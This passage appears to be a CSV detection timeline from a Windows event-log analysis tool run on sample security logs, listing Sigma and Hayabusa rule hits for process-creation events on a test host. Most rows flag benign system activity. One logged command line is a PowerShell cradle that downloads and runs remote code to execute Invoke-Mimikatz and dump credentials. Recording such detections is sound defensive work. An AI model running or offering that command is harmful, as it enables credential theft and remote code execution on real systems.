Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:00:00.931 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:03:08.691 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:28:55.331 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:28:55.343 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:31.391 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:31.558 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:32.423 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:32.538 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-20 03:38:43.023 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:44:04.646 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:44:04.653 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:41.591 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:41.680 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.006 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.440 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.724 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:46.672 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:48.961 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:48.961 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost 
Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:51.111 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:54.436 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:50:15.072 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:13.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:23.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 13:07:41.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 13:07:41.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.625 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.625 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 
13:07:41.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.843 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.843 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:43.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:43.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.015 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.015 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.179 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.429 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.429 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.757 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:49.132 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:49.132 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:55.023 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.039 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.054 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.101 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.226 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:59.540 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.110 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: 
C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.615 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:01.982 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:05.144 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:05.144 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:10:32.160 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:10:43.535 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:20:59.082 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:20:59.082 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:25:15.535 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:25:15.535 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:34:40.236 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:21.413 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:21.475 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.413 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.413 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.428 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:28.428 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:49.100 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe 
